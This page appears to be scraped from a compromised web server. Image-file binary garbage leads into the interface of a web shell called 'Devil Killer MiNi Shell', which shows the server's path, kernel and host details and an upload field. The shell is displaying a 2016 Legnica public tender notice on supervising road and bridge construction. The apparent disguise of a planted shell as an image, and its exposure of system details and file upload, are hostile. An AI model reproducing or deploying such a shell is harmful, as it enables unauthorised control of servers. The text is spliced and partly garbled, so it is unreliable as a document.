JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160222/39236-N-2016.html

<p class="kh_header"><b>Legnica: Wybór Wykonawcy na pełnienie nadzoru inwestorskiego we wszystkich branżach  nad realizacją zadania:  budowa Zbiorczej Drogi Południowej na odcinku od ul. Jaworzyńskiej do  al. Rzeczypospolitej  w  ramach zadania inwestycyjnego pn. Budowa Zbiorczej Drogi Południowej   w  Legnicy - Etap II od  ul. Wojska Polskiego do  al. Rzeczypospolitej  z  budową mostu  na rzece Kaczawie.</b><br>
<b>Numer ogłoszenia: 39236 - 2016; data zamieszczenia: 22.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Legnicy , pl. Słowiański 8, 59-220 Legnica, woj. dolnośląskie, tel. 076 7212100, faks 076 7212115.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.bip.legnica.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór Wykonawcy na pełnienie nadzoru inwestorskiego we wszystkich branżach  nad realizacją zadania:  budowa Zbiorczej Drogi Południowej na odcinku od ul. Jaworzyńskiej do  al. Rzeczypospolitej  w  ramach zadania inwestycyjnego pn. Budowa Zbiorczej Drogi Południowej   w  Legnicy - Etap II od  ul. Wojska Polskiego do  al. Rzeczypospolitej  z  budową mostu  na rzece Kaczawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot  zamówienia: 
1. Pełnienie nadzoru inwestorskiego we wszystkich branżach nad realizacją zadania inwestycyjnego: budowa Zbiorczej Drogi Południowej na odcinku od ul. Jaworzyńskiej do  al. Rzeczypospolitej  w  ramach zadania inwestycyjnego pn. Budowa Zbiorczej Drogi Południowej   w  Legnicy - Etap II od  ul. Wojska Polskiego do  al. Rzeczypospolitej  z  budową mostu  na rzece Kaczawie.
Zadanie inwestycyjne obejmuje wykonanie dokumentacji projektowej zmian,  ewentualną optymalizację,  wybudowanie, przekazanie do użytkowania  i  sfinansowanie  budowy  Zbiorczej Drogi  Południowej   na odcinku od ul. Jaworzyńskiej  do  al. Rzeczypospolitej  w  ramach zadania  pn. Budowa Zbiorczej Drogi Południowej  w  Legnicy -  Etap II od ul. Wojska Polskiego do  al. Rzeczypospolitej z  budową mostu  na rzece Kaczawie, w tym:
1.1. wykonanie dokumentacji projektowej zmian niezbędnej do realizacji zamówienia, uzyskanie wszelkich wymaganych prawem decyzji i uzgodnień, w tym przepisów prawa budowlanego, prawa wodnego i ochrony środowiska. Opracowanie dokumentacji projektowej zmian z wykorzystaniem Programu Funkcjonalno-Użytkowego (PFU), skróconego opisu przedmiotu zamówienia, dotyczy w szczególności odwodnienia drogi na odcinku od ul. Jaworzyńskiej do mostu na rzece Kaczawie, budowę i przebudowę kanalizacji deszczowej i związanych z tym koniecznych do wykonania zmian w pozostałych branżach. 
1.2. przygotowanie, zatwierdzenie i wprowadzenie tymczasowej i stałej organizacji ruchu, z  ewentualnym wykorzystaniem przekazanej dokumentacji,
1.3. wykonanie wszystkich robót budowlanych zgodnie z przekazaną przez Zamawiającego dokumentacją: projektem budowlano-wykonawczym, skróconym opisem przedmiotu zamówienia - załącznik nr 11 do niniejszej instrukcji, przedmiarami jako materiałem pomocniczym oraz opracowaną przez Wykonawcę dokumentację projektową zmian, w tym m.in:
1.3.1. budowę  drogi klasy Z - o długości ok. 1,3 km obejmującą:
a)	budowę i przebudowę jezdni - wykonanie nawierzchni bitumicznej,
b)	budowę i przebudowę ciągów pieszych - wykonanie nawierzchni z kostki betonowej, 
c)	budowę ciągów rowerowych - wykonanie nawierzchni z kostki betonowej,
d)	budowę zatok autobusowych o nawierzchni z betonu cementowego wraz z  wiatami,
e)	zagospodarowanie zieleni, w tym  m.in. wycinka drzew i realizacja projektu zieleni,
f)	zmianę i rozbudowę sygnalizacji świetlnej na skrzyżowaniach  al. Rzeczypospolitej/Bielańska, ul. Grabskiego/Jaworzyńska oraz na skrzyżowaniach opisanych w wytycznych zawartych w skróconym opisie przedmiotu zamówienia,
1.3.2. budowę trzyprzęsłowego mostu na rzece Kaczawie, betonowego o konstrukcji sprężonej,
1..3.3 budowę przejścia podziemnego,
1..3.4.budowę przepraw mostowych (4 obiekty) nad ciekiem Młynówka,
1..3.5.regulację koryta Młynówki z przebudową murów oporowych,
1.3.6.budowę parkingów o nawierzchni z kostki betonowej,
1.3.7.budowę i przebudowę sieci wodociągowej ( na rzecz LPWiK),
1.3.8.budowę i przebudowę  kanalizacji deszczowej - odwodnienie pasa drogowego, wraz z budową zbiornika retencyjnego, separatorów i przepompowni,
1.3.9.usunięcie kolizji z siecią kanalizacji sanitarnej,
1.3.10.roboty elektryczne  obejmujące:
a)budowę sieci oświetlenia ulicznego,
b)budowę stacji transformatorowej wraz z drogą dojazdową i sieci rozdzielczej,
c)budowę zasilania przepompowni, 
d)usunięcie kolizji z istniejącymi sieciami elektroenergetycznymi,
1.3.11.  budowę kanalizacji na cele szerokopasmowej sieci kanalizacji teleinformatycznej LEGMAN,
 1.3.12.   usunięcie kolizji z siecią gazową, teletechniczną,
1.4. zabezpieczenie nadzoru:
1.4.1. autorskiego w zakresie przygotowanej przez Wykonawcę dokumentacji projektowej zmian,
1.4.2. archeologicznego,
1.4.3. geologicznego,
1.4.4. geodezyjnego,
1.4.5. nadzoru saperskiego nad niebezpiecznymi znaleziskami,
1.4.6. innego, niż wymienione w pkt 1.4.1. - 1.4.5.  niezbędnego w celu bezpiecznego i prawidłowego  poprowadzenia inwestycji.
1.5 dokonanie ewentualnej optymalizacji - zmian w przyjętych rozwiązaniach projektowych w dokumentacji z uzyskaniem wszelkich wymaganych prawem decyzji oraz uzgodnień obejmujących:
- budowę zbiornika retencyjnego oraz budowę i przebudowę kanalizacji deszczowej z wykorzystaniem  wymagań zawartych  w załączonym do siwz programie funkcjonalno - użytkowym (PFU)  
- budowę trzyprzęsłowego mostu na rzece Kaczawie, betonowego o konstrukcji sprężonej 
- obiektów konstrukcyjnych,
- oświetlenia drogowego.
1.6. uwzględnienie i koordynację prac z podmiotami wykonującymi uzbrojenie podziemne, naziemne i nadziemne.
1.7. uwzględnienie i zorganizowanie prac w sposób zapewniający drożność, dojazd i dostęp do posesji, budynków, obiektów użyteczności publicznej, ogrodów działkowych, punktów handlowych lub usługowych, zapewnienie dojazdu dla pojazdów uprzywilejowanych np. pogotowie, straż pożarna, policja, oraz zachowania zasad bezpieczeństwa poprzez np. zabezpieczenie wykopów, oznakowanie, kładki i przejścia itp.
1.8. po zakończeniu budowy przywrócenie istniejących dróg, wykorzystywanych jako dojazd do budowy, 
do stanu nie gorszego niż sprzed rozpoczęcia robót.
1.9 uzyskanie wszelkich uzgodnień niezbędnych do realizacji zamówienia wraz z przekazaniem obiektu Zamawiającemu z uprawomocnionym pozwoleniem na użytkowanie.

Pozostałe roboty i szczegółowy opis przedmiotu zamówienia zawarty jest w: Programie Funkcjonalno-Użytkowym ( PFU), Wykazie cen,   Skróconym opisie przedmiotu zamówienia,   dokumentacji - Rozdział  4 siwz  i projekcie  umowy - Rozdział 3 siwz dla postępowania na wybór Wykonawcy robót na stronie internetowej Zamawiającego  http://um.bip.legnica.eu/uml/zamowienia-publiczne-ob/zamowienia-publiczne-w/15526,Przetag nieograniczony.html

1.2 Rozliczenie zadania inwestycyjnego tj. zakresu rzeczowego i finansowego zrealizowanego przez Wykonawcę robót i jego Podwykonawców,  w terminie do 30 dni po jego zakończeniu.
1.3.  W  zakres obowiązków zespołu nadzoru inwestorskiego wchodzą między innymi czynności:
1.3.1. odbywanie co najmniej dwóch wizyt w tygodniu na budowie w godzinach od 8.00 do 15.00-tej a w szczególnych przypadkach w ciągu 2 godzin od wezwania przez Zamawiającego. 
 1.3.2. uczestnictwo w przeglądach min. 2 razy w roku, w okresie trwania rękojmi - 10 lat od daty odbioru końcowego   i gwarancji  udzielonej przez Wykonawcę robót budowlanych.
1.3.3. wykonywanie zleconych prac z należytą starannością zgodnie z obowiązującymi przepisami Prawa Budowlanego - ustawa z dnia 07.07.1994 r. Prawo Budowlane (Dz. U. z 2013r. , poz.1409 - ze zmianami), z którego wynika zakres obowiązków inspektora nadzoru inwestorskiego.
1.3.4.ykonywanie zleconych prac z należytą starannością zgodnie z obowiązującymi przepisami prawa oraz zasadami wiedzy technicznej.
1.4 Pozostały zakres obowiązków zespołu nadzoru inwestorskiego określają między innymi czynności:
1.4.1 zapoznanie się z dokumentacją budowlano-wykonawczą oraz przedstawienie inwestorowi opinii co do jej kompletności i jakości oraz ewentualnych wad i niedokładności,
1.4.2. zapoznanie się z umowami o wykonawstwo robót, podwykonawstwo i dalsze podwykonawstwo i ścisłe przestrzeganie ich  postanowień, w szczególności w zakresie przejściowych odbiorów prac i płatności,
1.4.3.sprawdzenie placu budowy, ustalenie usytuowania punktów niwelacyjnych, jego granic oraz wytyczenia obiektów budowlanych,
1.4.4.sprawdzenie czy nie występują kolizje pomiędzy prowadzonymi robotami budowlanymi a istniejącym uzbrojeniem działek budowlanych i terenów przyległych wraz propozycją ich usunięcia,
1.4.5.uczestniczenie w przekazaniu placu budowy wykonawcy robót,
1.4.6.przestrzeganie zasady, aby w trakcie realizacji robót budowlanych nie naruszono interesów osób trzecich,
1.4.7.kontrola budowy pod względem jej zgodności z dokumentacją projektową, zezwolenie na realizację inwestycji drogowej (zrid), prawem budowlanym, innymi przepisami oraz wiedzą techniczną  min 2 razy w tygodniu- potwierdzanie  każdego pobytu wpisem do dziennika budow,
1.4.8.organizowanie wszystkich narad koordynacyjnych, rad budowy i komisji technicznych oraz sporządzanie z nich protokołów,
1.4.9.w terminie do 7 dni od dnia otrzymania dokumentów do weryfikacji:
1.4.9.1sprawdzanie i zatwierdzanie wykonania rzeczowego robót rozliczanych na podstawie zapisów w książce obmiaru robót,  sprawdzanie, analizowanie i weryfikacja zestawień ilości i wartości robót wg wykazu cen oraz harmonogramu rzeczowo-finansowego robót  i przekazanie do Wykonawcy,
1.4.9.2.sprawdzenie i przygotowanie narastająco zestawienia kosztów wykonanych robót w podziale na roboty wykonane przez Wykonawcę, Podwykonawcę oraz dalszego Podwykonawcę i przekazanie do Zamawiającego,
1.4.10.przygotowanie pisemnych wyjaśnień w przypadku występowania rozbieżności między stanem faktycznym a  dokumentacją  w terminie do 7 dni od dnia zatwierdzenia Wykonawcy zakresu wykonanych robót,
1.4.11.kontrolowanie prawidłowości prowadzenia dziennika budowy,
1.4.12.kontrolowanie postępu nadzorowanych robót i zgodność ich wykonania z terminami określonymi w harmonogramie rzeczowo-finansowym robót,
1.4.13.sprawdzanie i potwierdzanie protokołów odbioru wykonanych elementów robót pod względem merytorycznym i rachunkowym,
1.4.14.współpraca z nadzorem autorskim, wyjaśnianie z nim ewentualnych poprawek i uzupełnień w dokumentacji w przypadku stwierdzenia w niej niedopracowań,
1.4.15.w przypadku niezbędnych zmian w rozwiązaniach konstrukcyjnych i architektonicznych wnioskowanie do inwestora o wprowadzenie tych zmian oraz rozstrzygnięć wraz ze wskazaniem - w uzgodnieniu z nadzorem autorskim - kierownikowi budowy sposobu rozwiązania,
1.4.16.nadzór nad wprowadzaniem zmian w dokumentacji projektowej,  w tym zmian nieistotnych w stosunku do rozwiązań zatwierdzonych decyzją ZRID i złożenia dokumentacji zmian (zgodnie z wymogami Prawa budowlanego) na dzień zakończenia robót, 
1.4.17.sprawdzanie na bieżąco sporządzanego narastająco i przedłożonego przez wykonawcę robót operatu kolaudacyjnego,
1.4.18.sprawdzenie sporządzonego i przedłożonego przez wykonawcę robót operatu kolaudacyjnego na dzień zakończenia robót i potwierdzenie jego kompletności,
1.4.19.sprawdzenie i zaakceptowanie w terminie 10 dni ewentualnych zmian w przyjętych rozwiązaniach projektowych w dokumentacji  - optymalizacja- przewidzianych w siwz na wybór Wykonawcy robót, w tym m.in.:
1.4.19.1.konstrukcji nośnej obiektu mostowego MD-2, zgodnie z wytycznymi Zamawiającego: Zamawiający dopuszcza optymalizację ustroju nośnego obiektu mostowego MD-2 na konstrukcję żelbetową, sprężoną lub prefabrykowaną. Nie dopuszcza się zmian ustrojów nośnych konstrukcji obiektów na konstrukcje zespolone stalowo-betonowe lub stalowe. Ewentualne zmiany typu ustroju nośnego należy potwierdzić pełną analizą statyczno-wytrzymałościową zarówno w odniesieniu do ustroju nośnego jak również do podpór i elementów posadowienia.,
1.4.19.2. wymiany gruntu nienośnego po potwierdzeniu przez Nadzór Geologiczny na grunt nośny jako sposób wzmocnienia podłoża gruntowego pod warunkiem wykonania przez Wykonawcę robót analiz obliczeniowych nośności fundamentów oraz wartości osiadania,    
1.4.19.3.szczegółowych rozwiązań wraz z obliczeniami optymalizacji obiektów konstrukcyjnych, w tym zmiany posadowienia przejścia podziemnego PP-1,
1.4.19.4 materiału prefabrykatów łukowych dla zaprojektowanych obiektów, które powinny zapewnić co najmniej równoważną trwałość konstrukcji; ewentualne zmiany w zakresie ustroju nośnego tychże obiektów pod warunkiem, że Wykonawca potwierdzi zmianę pełną analizą statyczno-wytrzymałościową zarówno w odniesieniu do ustrojów nośnych jak również do podpór i elementów posadowienia,
1.4.19.5 technologii posadowienia podpór obiektu pod warunkiem zachowania parametrów nośności i trwałości po wcześniejszej pozytywnej opinii Nadzoru autorskiego,
1.4.19.6	ustrojów nośnych betonowych prefabrykowanych na konstrukcję monolityczną pod warunkiem wykonania przez Wykonawcę robót dla tych elementów obliczeń statyczno-wytrzymałościowych oraz rysunków zbrojeniowych,
1.4.19.7 prefabrykatów dla konkretnego obiektu,
1.4.19.8 geometrii podpór mostowych,
1.4.19.9 zamiany paneli ścian oporowych na elementy drobnowymiarowe również służących do budowy tego rodzaju ścian oporowych, pod warunkiem spełnienia warunków określonych  w dokumentacji projektowej i specyfikacjach technicznych,
1.4.19.10	sprawdzenie parametrów oświetlenia- zmiana na oprawy typu LED,
1.4.19.11	budowę zbiornika retencyjnego oraz budowę i przebudowę kanalizacji deszczowej 
 z wykorzystaniem  wymagań zawartych  w załączonym do SIWZ na wybór Wykonawcy robót   programie funkcjonalno - użytkowym (PFU).  
1.4.20.potwierdzenie zgłoszenia przez Wykonawcę gotowości wykonanych prac do ich odbioru końcowego wraz z jednoczesnym przekazaniem zadania inwestycyjnego do użytkowania z ostateczną decyzją pozwolenia na użytkowanie,
1.4.21.kontrola płatności należności w drugiej i kolejnych faktur wystawionych przez Wykonawcę robót w zakresie prac realizowanych przez Podwykonawców i dalszych Podwykonawców,
1.4.22.kontrola i potwierdzanie realizacji zakresu prac wykonywanych przez Wykonawcę robót oraz zgłoszonych przez niego Podwykonawców i dalszych Podwykonawców, zgodnie z umowami na Podwykonawstwo i dalsze podwykonawstwo,
1.4.23.kwalifikowanie jakości i ilości materiałów do odzysku lub utylizacji wg zapisów w siwz, STWiOR  oraz  Skróconego opisu przedmiotu zamówienia- postępowania na wybór Wykonawcy robót,
1.4.24.kontrola i każdorazowe potwierdzanie protokołami ilości materiałów z odzysku, przekazywanych przez Wykonawcę robót do odzysku lub utylizacji, min. drzewa, humus, frez itp,
1.4.25.kompletowanie protokołów: robót zamiennych, odbiorów technicznych i przeglądów,
1.4.26.sprawdzanie miesięcznych wykazów: wykazu zatrudnionych pracowników na umowę o pracę wraz z wykazami pracowników na umowę o pracę z minimalnym wynagrodzeniem,  sporządzanych przez Wykonawcę robót,
1.4.27.kontrola organizacji ruchu na czas budowy  1 raz w tygodniu i przekazywanie ww. informacji w formie notatki Zamawiającemu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.63.13.00-3, 71.32.20.00-0, 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 5.000,- PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają  poniższy warunek udziału w postępowaniu:
Dysponowania osobami zdolnymi do wykonania zamówienia tj. mają do dyspozycji odpowiednio wykwalifikowany personel w celu obsadzenia podanych niżej  stanowisk:
1)  Inspektor nadzoru robót budowlanych branży drogowej - koordynator inspektorów nadzoru:
osoba z uprawnieniami budowlanymi w specjalności drogowej bez ograniczeń, wpisana na listę członków izby samorządu zawodowego  zgodnie  z  zapisami  Rozdziału 2 ustawy Prawo budowlane z 07.07.1994r. (Dz. U. z 2013r. , poz.1409 - ze zmianami)  i   ubezpieczona  od odpowiedzialności cywilnej   za   szkody,   które   mogą  wyniknąć  w  związku  z   wykonywaniem  ww.  funkcji, która posiada kwalifikacje i doświadczenie, polegające na tym, że:
a) była inspektorem nadzoru na 1  zadaniu polegającym na:
budowie lub przebudowie drogi wraz z uzbrojeniem, której efektem jest   droga  klasy min. Z (w rozumieniu ustawy z dnia 21 marca 1985r. o drogach publicznych Dz. U. z 2013r., poz. 260 ze zmianami) w terenie zabudowy, o kategorii ruchu min. KR4, jezdni o  nawierzchni bitumicznej, długości w jednym ciągu min. 300m, 
b) była projektantem na 1 zadaniu polegającym na:
      budowie lub przebudowie drogi wraz z uzbrojeniem, której efektem jest   droga  klasy min. Z (w rozumieniu ustawy z dnia 21 marca 1985r. o drogach publicznych Dz. U. z 2013r., poz. 260 ze zmianami) w terenie zabudowy, o kategorii ruchu min. KR4, jezdni o  nawierzchni bitumicznej, długości w jednym ciągu min. 300m,
wraz z informacjami na temat jego kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności.

Inspektor nadzoru robót budowlanych branży drogowej będzie pełnił funkcje koordynatora.

2) Inspektor nadzoru robót elektrycznych:
osoba z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, wpisana na listę członków izby samorządu zawodowego zgodnie z zapisami Rozdziału 2 ustawy Prawo budowlane z 07.07.1994r.( Dz. U. z 2013r., poz.1409 - ze zmianami) i  ubezpieczona od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku  z wykonywaniem ww. funkcji, która posiada kwalifikacje i doświadczenie, polegające na tym, że:
a) była inspektorem nadzoru na 1  zadaniu polegającym na:
       budowie lub przebudowie oświetlenia drogowego, w drodze  klasy min. Z (w rozumieniu ustawy z dnia 21 marca 1985r. o drogach publicznych Dz. U. z 2013r., poz. 260 ze zmianami) w terenie zabudowy długości w jednym ciągu min. 300m, 
 b) była projektantem na 1 zadaniu polegającym na:
       budowie lub przebudowie oświetlenia drogowego, w drodze  klasy min. Z (w rozumieniu ustawy z dnia 21 marca 1985r. o drogach publicznych Dz. U. z 2013r., poz. 260 ze zmianami) w terenie zabudowy długości w jednym ciągu min. 300m, 
wraz z informacjami na temat jego kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności.

3) Inspektor nadzoru robót sanitarnych:
 osoba z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, wpisana na listę członków izby samorządu zawodowego zgodnie z zapisami Rozdziału 2 ustawy Prawo budowlane z 07.07.1994r. (Dz. U. z 2013r., poz.1409 - ze zmianami) i  ubezpieczona od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku  z wykonywaniem ww. funkcji, która posiada kwalifikacje i doświadczenie, polegające na tym, że:
a) była inspektorem nadzoru na 1  zadaniu polegającym na:
     budowie przepompowni ścieków o wydajności min 450l/s .
wraz z informacjami na temat jego kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności.

4) Inspektor nadzoru robót telekomunikacyjnych:
 osoba z uprawnieniami budowlanymi w specjalności telekomunikacyjnej bez ograniczeń, wpisana na listę członków izby samorządu zawodowego zgodnie z zapisami Rozdziału 2 ustawy Prawo budowlane z 07.07.1994r. (Dz. U. z 2010r. Nr 243, poz. 1623 -  z   późniejszymi  zmianami) i  ubezpieczona od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku  z wykonywaniem ww. funkcji.

5) Inspektor nadzoru robót mostowych:
osoba z uprawnieniami budowlanymi w specjalności mostowej bez ograniczeń, wpisana na listę członków izby samorządu zawodowego zgodnie z zapisami Rozdziału 2 ustawy Prawo budowlane z 07.07.1994r. (Dz. U. z 2013r., poz.1409 - ze zmianami) i  ubezpieczona od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku  z wykonywaniem ww. funkcji która posiada kwalifikacje i doświadczenie, polegające na tym, że:
a) była inspektorem nadzoru na 1  zadaniu polegającym na:
   budowie lub przebudowie wieloprzęsłowego obiektu mostowego o długości teoretycznej co najmniej jednego przęsła min. 30 m  w terenie zabudowy 
b)  była projektantem na 1 zadaniu polegającym na:
     budowie lub przebudowie wieloprzęsłowego obiektu mostowego o długości teoretycznej co najmniej jednego przęsła min. 30 m  w terenie zabudowy 
wraz z informacjami na temat jego kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności.

 Ocena spełnienia warunku według:
 a)  oświadczenia Wykonawcy- załącznik nr 1 do Instrukcji dla Wykonawców - Rozdział 2 siwz  oraz
b) wykazu wg wzoru załącznik nr 3, osób, które będą uczestniczyć w wykonaniu zamówienia wraz 
z informacjami na temat ich kwalifikacji  zawodowych, doświadczenia  i wykształcenia  niezbędnych 
do wykonania zamówienia a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania  tymi osobami - wg załącznika  nr 4 do niniejszej instrukcji,  oraz:
